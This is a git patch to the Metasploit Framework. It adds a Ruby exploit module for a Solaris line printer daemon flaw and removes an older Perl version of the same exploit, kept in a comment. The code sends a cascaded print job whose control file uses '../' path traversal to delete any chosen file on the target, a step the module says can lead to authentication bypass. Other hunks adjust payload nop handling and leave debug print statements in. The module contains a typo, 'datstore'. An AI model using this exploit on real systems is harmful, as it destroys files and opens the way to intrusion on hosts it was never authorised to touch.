From 9fc93bbe566d9b7883a51d81f42b40682dc49cbf Mon Sep 17 00:00:00 2001 From: HD Moore Date: Mon, 2 Jan 2006 01:12:36 +0000 Subject: [PATCH] Miscellaneous fixes, changes to CMD payloads git-svn-id: file:///home/svn/incoming/trunk@3296 4d416f70-5f16-0410-b530-b9f4589650da --- lib/msf/base/simple/exploit.rb | 5 + lib/msf/core/encoded_payload.rb | 5 + lib/rex/constants.rb | 17 +- .../exploits/solaris/lpd/cascade_delete.rb | 102 +++++++++ .../solaris/lpd/solaris_lpd_unlink.rb | 198 ------------------ modules/exploits/solaris/telnet/ttyprompt.rb | 7 +- .../exploits/windows/http/icecast_header.rb | 4 +- 7 files changed, 120 insertions(+), 218 deletions(-) create mode 100644 modules/exploits/solaris/lpd/cascade_delete.rb delete mode 100644 modules/exploits/solaris/lpd/solaris_lpd_unlink.rb diff --git a/lib/msf/base/simple/exploit.rb b/lib/msf/base/simple/exploit.rb index a4202b8baf..bd3567ef81 100644 --- a/lib/msf/base/simple/exploit.rb +++ b/lib/msf/base/simple/exploit.rb @@ -51,6 +51,11 @@ module Exploit # job. # def self.exploit_simple(exploit, opts) + + p exploit.methods.sort + p exploit.payload? + p exploit.payload_info + # Make sure parameters are valid. if (opts['Payload'] == nil) raise MissingPayloadError, diff --git a/lib/msf/core/encoded_payload.rb b/lib/msf/core/encoded_payload.rb index ca332b1f97..24f4239355 100644 --- a/lib/msf/core/encoded_payload.rb +++ b/lib/msf/core/encoded_payload.rb @@ -110,6 +110,8 @@ class EncodedPayload # Get the minimum number of nops to use min = (reqs['MinNops'] || 0).to_i + min = 0 if reqs['DisableNops'] + # Check to see if we have enough room for the minimum requirements if ((reqs['Space']) and @@ -164,6 +166,9 @@ class EncodedPayload self.nop_sled_size = reqs['MaxNops'] end + # Check for the DisableNops setting + self.nop_sled_size = 0 if reqs['DisableNops'] + # Now construct the actual sled if (self.nop_sled_size > 0) pinst.compatible_nops.each { |nopname, nopmod| diff --git a/lib/rex/constants.rb b/lib/rex/constants.rb index 06207ff197..216f52702a 100644 --- a/lib/rex/constants.rb +++ b/lib/rex/constants.rb @@ -68,23 +68,14 @@ ARCH_X86 = 'x86' ARCH_MIPS = 'mips' ARCH_PPC = 'ppc' ARCH_SPARC = 'sparc' +ARCH_CMD = 'cmd' ARCH_TYPES = [ ARCH_X86, ARCH_MIPS, ARCH_PPC, - ARCH_SPARC + ARCH_SPARC, + ARCH_CMD, ] - -ARCH_CMD_UNIX = 'cmd_unix' -ARCH_CMD_LINUX = 'cmd_linux' -ARCH_CMD_BSD = 'cmd_bsd' -ARCH_CMD = - [ - ARCH_CMD_UNIX, - ARCH_CMD_LINUX, - ARCH_CMD_BSD - ] - -ARCH_ALL = ARCH_TYPES + ARCH_CMD +ARCH_ALL = ARCH_TYPES diff --git a/modules/exploits/solaris/lpd/cascade_delete.rb b/modules/exploits/solaris/lpd/cascade_delete.rb new file mode 100644 index 0000000000..324121355f --- /dev/null +++ b/modules/exploits/solaris/lpd/cascade_delete.rb @@ -0,0 +1,102 @@ +require 'msf/core' + +module Msf + +class Exploits::Solaris::Lpd::CascadeDelete < Msf::Exploit::Remote + + include Exploit::Remote::Tcp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Solaris LPD Arbitrary File Delete', + 'Description' => %q{ + This module uses a vulnerability in the Solaris line printer + daemon to delete arbitrary files on an affected system. This + can be used to exploit the rpc.walld format string flaw, the + missing krb5.conf authentication bypass, or simply delete + system files. Tested on Solaris 2.6, 7, 8, 9, and 10. + + }, + 'Author' => [ 'hdm', 'Optyx ' ], + 'Version' => '$Revision$', + 'References' => + [ + [ 'URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-26-101842-1'], + ], + 'Targets' => + [ + ['Automatic Target', { }] + ], + 'DisclosureDate' => '', + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RPORT(515), + OptString.new('RPATH', [ true, "The remote file path to delete"]), + ], self.class) + end + + def exploit + + # Create a simple control file... + control = "Hmetasploit\nPr00t\n"; + + # The job ID is squashed down to three decimal digits + jid = ($$ % 1000).to_s + [Time.now.to_i].pack('N').unpack('H*')[0] + + # Establish the first connection to the server + sock1 = connect(false) + + # Request a cascaded job + sock1.put("\x02metasploit:framework\n") + res = sock1.get_once + if (not res) + print_status("The target did not accept our job request command") + return + end + + # Theoretically, we could delete multiple files at once, however + # the lp daemon will append garbage from memory to the path name + # if we don't stick a null byte after the path. Unfortunately, this + # null byte will prevent the parser from processing the other paths. + control << "U" + ("../" * 10) + "#{datastore['RPATH']}\x00\n" + + dataf = "http://metasploit.com/\n" + + print_status("Deleting #{datstore['RPATH']}...") + if (not ( + send_file(sock1, 2, "cfA" + jid + "metasploit", control) and + send_file(sock1, 3, "dfa" + jid + "metasploit", dataf) + ) ) + sock1.close + return + end + + print_status("Successfully deleted #{datastore['RPATH']} >:-]") + sock1.close + end + + def send_file (s, type, name, data='') + + s.put(type.chr + data.length.to_s + " " + name + "\n") + res = s.get_once(1) + if (not (res and res[0] == 0)) + print_status("The target did not accept our control file command (#{name})") + return + end + + s.put(data) + s.put("\x00") + res = s.get_once(1) + if (not (res and res[0] == 0)) + print_status("The target did not accept our control file data (#{name})") + return + end + + print_status(sprintf(" Uploaded %.4d bytes >> #{name}", data.length)) + return true + end + +end +end diff --git a/modules/exploits/solaris/lpd/solaris_lpd_unlink.rb b/modules/exploits/solaris/lpd/solaris_lpd_unlink.rb deleted file mode 100644 index 4ffce72106..0000000000 --- a/modules/exploits/solaris/lpd/solaris_lpd_unlink.rb +++ /dev/null @@ -1,198 +0,0 @@ -require 'msf/core' - -module Msf - -class Exploits::Windows::XXX_CHANGEME_XXX < Msf::Exploit::Remote - - include Exploit::Remote::Tcp - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Solaris LPD Arbitrary File Delete', - 'Description' => %q{ - This module uses a vulnerability in the Solaris line printer - daemon to delete arbitrary files on an affected system. This - can be used to exploit the rpc.walld format string flaw, the - missing krb5.conf authentication bypass, or simple delete - system files. Tested on Solaris 2.6, 7, 8, 9, and 10. - - }, - 'Author' => [ 'hdm', 'Optyx ' ], - 'Version' => '$Revision$', - 'References' => - [ - [ 'URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-26-101842-1'], - - ], - 'Privileged' => true, - - 'Targets' => - [ - [ - 'Automatic Targetting', - { - 'Platform' => 'solaris', - 'Ret' => 0x0, - }, - ], - ], - 'DisclosureDate' => '', - 'DefaultTarget' => 0)) - end - - def exploit - connect - - handler - disconnect - end - -=begin - -## -# This file is part of the Metasploit Framework and may be redistributed -# according to the licenses defined in the Authors field below. In the -# case of an unknown or missing license, this file defaults to the same -# license as the core Framework (dual GPLv2 and Artistic). The latest -# version of the Framework can always be obtained from metasploit.com. -## - -package Msf::Exploit::solaris_lpd_unlink; -use base "Msf::Exploit"; -use IO::Socket; -use IO::Select; -use strict; -use Pex::Text; - -my $advanced = { }; - -my $info = - { - 'Name' => 'Solaris LPD Arbitrary File Delete', - 'Version' => '$Revision$', - 'Authors' => - [ - 'H D Moore ', - 'Optyx ' - ], - - 'Arch' => [ ], - 'OS' => [ 'solaris' ], - - 'UserOpts' => - { - 'RHOST' => [1, 'ADDR', 'The target address'], - 'RPORT' => [1, 'PORT', 'The LPD server port', 515], - 'RPATH' => [1, 'DATA', 'The remote path name to delete'], - }, - - 'Description' => Pex::Text::Freeform(qq{ - This module uses a vulnerability in the Solaris line printer daemon - to delete arbitrary files on an affected system. This can be used to exploit - the rpc.walld format string flaw, the missing krb5.conf authentication bypass, - or simple delete system files. Tested on Solaris 2.6, 7, 8, 9, and 10. -}), - - 'Refs' => - [ - ['URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-26-101842-1'], - ], - - 'DefaultTarget' => 0, - 'Targets' => [['No Target Needed']], - - 'Keys' => ['lpd'], - }; - -sub new { - my $class = shift; - my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); - return($self); -} - -sub Exploit { - my $self = shift; - my $target_host = $self->GetVar('RHOST'); - my $target_port = $self->GetVar('RPORT'); - my $target_path = $self->GetVar('RPATH'); - my $res; - - # We use one connection to configure the spool directory - my $s = Msf::Socket::Tcp->new - ( - 'PeerAddr' => $target_host, - 'PeerPort' => $target_port, - 'LocalPort' => $self->GetVar('CPORT'), - 'SSL' => $self->GetVar('SSL'), - ); - if ($s->IsError) { - $self->PrintLine('[*] Error creating socket: ' . $s->GetError); - return; - } - - # Send a job request that will trigger the cascade adaptor (thanks Dino!) - $s->Send("\x02"."metasploit:framework\n"); - $res = $s->Recv(1, 5); - if (ord($res) != 0) { - $self->PrintLine("[*] The target did not accept our job request command"); - return; - } - - # The job ID is squashed down to three decimal digits - my $jid = ($$ % 1000).unpack("H*",pack('N', time() + $$)); - - # Create a simple control file... - my $control = "Hmetasploit\nPr00t\n"; - - # Theoretically, we could delete multiple files at once, however - # the lp daemon will append garbage from memory to the path name - # if we don't stick a null byte after the path. Unfortunately, this - # null byte will prevent the parser from processing the other paths. - $control .= "U".("../" x 10)."$target_path\x00\n"; - - my $dataf = "http://metasploit.com/\n"; - - $self->PrintLine("[*] Sending the malicious cascaded job request..."); - if ( ! $self->SendFile($s, 2, "cfA".$jid."metasploit", $control) || - ! $self->SendFile($s, 3, "dfa".$jid."metasploit", $dataf) || - 0 - ) { $s->Close; return } - - $self->PrintLine(''); - $self->PrintLine("[*] Successfully deleted $target_path >:-]"); - return; -} - -sub SendFile { - my $self = shift; - my $sock = shift; - my $type = shift; - my $name = shift; - my $data = shift; - - $sock->Send(chr($type) .length($data). " $name\n"); - my $res = $sock->Recv(1, 5); - if (ord($res) != 0) { - $self->PrintLine("[*] The target did not accept our control file command ($name)"); - return; - } - - $sock->Send($data); - $sock->Send("\x00"); - $res = $sock->Recv(1, 5); - if (ord($res) != 0) { - $self->PrintLine("[*] The target did not accept our control file data ($name)"); - return; - } - - $self->PrintLine(sprintf("[*] Uploaded %.4d bytes >> $name", length($data))); - return 1; -} - -1; - -=end - - -end -end diff --git a/modules/exploits/solaris/telnet/ttyprompt.rb b/modules/exploits/solaris/telnet/ttyprompt.rb index 963ba8fa6d..31cf8cc356 100644 --- a/modules/exploits/solaris/telnet/ttyprompt.rb +++ b/modules/exploits/solaris/telnet/ttyprompt.rb @@ -23,14 +23,13 @@ class Exploits::Solaris::Telnet::TTYPrompt_Auth_Bypass < Msf::Exploit::Remote ], 'Privileged' => false, - 'Platform' => 'unix', + 'Platform' => ['unix', 'solaris'], 'Arch' => ARCH_CMD, 'Payload' => { 'Space' => 2000, - 'BadChars' => "", - 'MinNops' => 0, - 'MaxNops' => 0, + 'BadChars' => '', + 'DisableNops' => true, }, 'PayloadCompat' => { diff --git a/modules/exploits/windows/http/icecast_header.rb b/modules/exploits/windows/http/icecast_header.rb index d4042819b9..b035ed27c7 100644 --- a/modules/exploits/windows/http/icecast_header.rb +++ b/modules/exploits/windows/http/icecast_header.rb @@ -45,9 +45,7 @@ class Exploits::Windows::Http::Icecast_Header_Overflow < Msf::Exploit::Remote { 'Space' => 2000, 'BadChars' => "\x0d\x0a\x00", - 'MinNops' => 0, - 'MaxNops' => 0, - + 'DisableNops' => true, }, 'Platform' => 'win', 'Targets' =>